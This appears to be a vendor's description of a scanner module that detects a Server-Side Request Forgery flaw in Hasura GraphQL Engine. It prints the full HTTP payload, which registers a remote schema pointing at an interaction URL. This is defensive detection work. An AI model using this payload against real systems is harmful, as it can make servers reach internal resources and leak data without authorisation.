Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
This module, named "Hasura GraphQL Engine - SSRF Side Request Forgery", is designed to detect a vulnerability in the Hasura GraphQL Engine software. The severity level of this vulnerability is high.
The "Hasura GraphQL Engine - SSRF Side Request Forgery" module is a test case designed to detect a specific vulnerability in the Hasura GraphQL Engine software. This vulnerability is categorized as high severity, indicating its potential impact on the security of the system.
This vulnerability, if exploited, can lead to Server-Side Request Forgery (SSRF) attacks. SSRF allows an attacker to make requests to internal or external resources on behalf of the vulnerable server, potentially leading to unauthorized access, data leakage, or further exploitation of the system.
The module works by sending a specific HTTP request to the target system and analyzing the response. It checks for two matching conditions:
If both conditions are met, the module identifies the presence of the vulnerability.
Here is an example of the HTTP request used by the module:
POST /v1/query HTTP/1.1
Host: <Hostname>
Content-Type: application/json
Accept: */*
{
"type":"bulk",
"args":[
{
"type":"add_remote_schema",
"args":{
"name":"test",
"definition":{
"url":"https://<InteractionURL>",
"headers":[
],
"timeout_seconds":60,
"forward_client_headers":true
}
}
}
]
}
The module sends this request to the target system, replacing the placeholders "<Hostname>" and "<InteractionURL>" with the actual values. It then analyzes the response to determine if the vulnerability is present.
If the vulnerability is detected, it is recommended to take immediate action to address the SSRF vulnerability in the Hasura GraphQL Engine software. This may involve applying patches or updates provided by the software vendor, implementing secure configuration settings, or following other recommended security practices.